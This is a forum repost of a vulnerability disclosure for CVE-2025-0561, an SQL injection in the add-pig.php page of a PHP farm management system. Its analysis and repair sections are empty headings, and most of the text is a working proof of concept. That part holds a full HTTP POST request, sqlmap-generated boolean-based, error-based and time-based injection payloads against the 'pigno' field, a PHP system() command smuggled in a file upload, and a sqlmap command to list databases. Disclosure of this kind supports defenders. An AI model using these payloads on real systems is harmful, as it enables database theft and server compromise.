IT评测·应用市场-qidao123.com技术社区

标题: CVE-2025-0561 [打印本页]
作者: 用户云卷云舒    时间: 2025-1-20 05:02
标题: CVE-2025-0561
Itsourcecode Farm Management System In PHP v1.0 add-pig.php SQL injection

AFFECTED AND/OR FIXED VERSION(S)

submitter


Vulnerable File


VERSION(S)


PROBLEM TYPE

Vulnerability Type


Root Cause



Impact


DESCRIPTION


Vulnerability details and POC

  1. POST /add-pig.php HTTP/1.1
  2. Host: 192.168.1.136:1219
  3. User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:126.0) Gecko/20100101 Firefox/126.0
  4. Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
  5. Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
  6. Accept-Encoding: gzip, deflate, br
  7. Content-Type: multipart/form-data; boundary=---------------------------359458591942496535511331165261
  8. Content-Length: 1199
  9. Origin: http://192.168.1.136:1219
  10. Connection: close
  11. Referer: http://192.168.1.136:1219/add-pig.php
  12. Cookie: pma_lang=zh_CN; pmaUser-1=%7B%22iv%22%3A%227LWOmQxn1kFNKDQIKEqUQQ%3D%3D%22%2C%22mac%22%3A%22f46715269295f7bc9c1753cf49cb29de885e0738%22%2C%22payload%22%3A%22uwlGMpERga3ktRQQmcLQUg%3D%3D%22%7D; PHPSESSID=4j8anjs7rlcs27867bnlmj1116; phpMyAdmin=5r1opuf2mqc9j30vli7mfrhvtt; pmaAuth-1=%7B%22iv%22%3A%22HbgyCK8mDtH6Yh3l1rTCWw%3D%3D%22%2C%22mac%22%3A%226259e5b1095aeff224b50540aea65c624fb900c9%22%2C%22payload%22%3A%22SiwuQJzR6qfxiA6velzoYRz%2BXnITRHrg37ZL9M1sbb0%3D%22%7D
  13. Upgrade-Insecure-Requests: 1
  14. Priority: u=1
  16. -----------------------------359458591942496535511331165261
  17. Content-Disposition: form-data; name="pigno"
  19. pig-fms-5320
  20. -----------------------------359458591942496535511331165261
  21. Content-Disposition: form-data; name="weight"
  23. 123
  24. -----------------------------359458591942496535511331165261
  25. Content-Disposition: form-data; name="arrived"
  27. 2024-06-01
  28. -----------------------------359458591942496535511331165261
  29. Content-Disposition: form-data; name="gender"
  31. male
  32. -----------------------------359458591942496535511331165261
  33. Content-Disposition: form-data; name="status"
  35. active
  36. -----------------------------359458591942496535511331165261
  37. Content-Disposition: form-data; name="breed"
  39. 1
  40. -----------------------------359458591942496535511331165261
  41. Content-Disposition: form-data; name="remark"
  43. 123
  44. -----------------------------359458591942496535511331165261
  45. Content-Disposition: form-data; name="pigphoto"; filename="123.php"
  46. Content-Type: application/octet-stream
  48. -----------------------------359458591942496535511331165261
  49. Content-Disposition: form-data; name="submit"
  52. -----------------------------359458591942496535511331165261--
复制代码
Vulnerability type:


Vulnerability location:


Payload:

  1. Parameter: MULTIPART pigno ((custom) POST)
  2.     Type: boolean-based blind
  3.     Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause
  4.     Payload: -----------------------------359458591942496535511331165261
  5. Content-Disposition: form-data; name="pigno"
  7. pig-fms-5320' RLIKE (SELECT (CASE WHEN (5474=5474) THEN 0x7069672d666d732d35333230 ELSE 0x28 END)) AND 'YqbQ'='YqbQ
  8. -----------------------------359458591942496535511331165261
  9. Content-Disposition: form-data; name="weight"
  11. 123
  12. -----------------------------359458591942496535511331165261
  13. Content-Disposition: form-data; name="arrived"
  15. 2024-06-01
  16. -----------------------------359458591942496535511331165261
  17. Content-Disposition: form-data; name="gender"
  19. male
  20. -----------------------------359458591942496535511331165261
  21. Content-Disposition: form-data; name="status"
  23. active
  24. -----------------------------359458591942496535511331165261
  25. Content-Disposition: form-data; name="breed"
  27. 1
  28. -----------------------------359458591942496535511331165261
  29. Content-Disposition: form-data; name="remark"
  31. 123
  32. -----------------------------359458591942496535511331165261
  33. Content-Disposition: form-data; name="pigphoto"; filename="123.php"
  34. Content-Type: application/octet-stream
  36. <?php system("ipconfig"); ?>
  37. -----------------------------359458591942496535511331165261
  38. Content-Disposition: form-data; name="submit"
  41. -----------------------------359458591942496535511331165261--
  43.     Type: error-based
  44.     Title: MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)
  45.     Payload: -----------------------------359458591942496535511331165261
  46. Content-Disposition: form-data; name="pigno"
  48. pig-fms-5320' AND EXTRACTVALUE(4487,CONCAT(0x5c,0x7178767871,(SELECT (ELT(4487=4487,1))),0x71786a7a71)) AND 'nUep'='nUep
  49. -----------------------------359458591942496535511331165261
  50. Content-Disposition: form-data; name="weight"
  52. 123
  53. -----------------------------359458591942496535511331165261
  54. Content-Disposition: form-data; name="arrived"
  56. 2024-06-01
  57. -----------------------------359458591942496535511331165261
  58. Content-Disposition: form-data; name="gender"
  60. male
  61. -----------------------------359458591942496535511331165261
  62. Content-Disposition: form-data; name="status"
  64. active
  65. -----------------------------359458591942496535511331165261
  66. Content-Disposition: form-data; name="breed"
  68. 1
  69. -----------------------------359458591942496535511331165261
  70. Content-Disposition: form-data; name="remark"
  72. 123
  73. -----------------------------359458591942496535511331165261
  74. Content-Disposition: form-data; name="pigphoto"; filename="123.php"
  75. Content-Type: application/octet-stream
  77. <?php system("ipconfig"); ?>
  78. -----------------------------359458591942496535511331165261
  79. Content-Disposition: form-data; name="submit"
  82. -----------------------------359458591942496535511331165261--
  84.     Type: time-based blind
  85.     Title: MySQL >= 5.0.12 RLIKE time-based blind
  86.     Payload: -----------------------------359458591942496535511331165261
  87. Content-Disposition: form-data; name="pigno"
  89. pig-fms-5320' RLIKE SLEEP(5) AND 'bQdJ'='bQdJ
  90. -----------------------------359458591942496535511331165261
  91. Content-Disposition: form-data; name="weight"
  93. 123
  94. -----------------------------359458591942496535511331165261
  95. Content-Disposition: form-data; name="arrived"
  97. 2024-06-01
  98. -----------------------------359458591942496535511331165261
  99. Content-Disposition: form-data; name="gender"
  101. male
  102. -----------------------------359458591942496535511331165261
  103. Content-Disposition: form-data; name="status"
  105. active
  106. -----------------------------359458591942496535511331165261
  107. Content-Disposition: form-data; name="breed"
  109. 1
  110. -----------------------------359458591942496535511331165261
  111. Content-Disposition: form-data; name="remark"
  113. 123
  114. -----------------------------359458591942496535511331165261
  115. Content-Disposition: form-data; name="pigphoto"; filename="123.php"
  116. Content-Type: application/octet-stream
  119. -----------------------------359458591942496535511331165261
  120. Content-Disposition: form-data; name="submit"
  123. -----------------------------359458591942496535511331165261--
复制代码

The following are screenshots of some specific information obtained from testing and running with the sqlmap tool:

  1. sqlmap -r 123 --batch --dbs  
复制代码

Suggested repair


免责声明:如果侵犯了您的权益,请联系站长,我们会及时删除侵权内容,谢谢合作!更多信息从访问主页:qidao123.com:ToB企服之家,中国第一个企服评测及商务社交产业平台。



欢迎光临 IT评测·应用市场-qidao123.com技术社区 (https://dis.qidao123.com/) Powered by Discuz! X3.4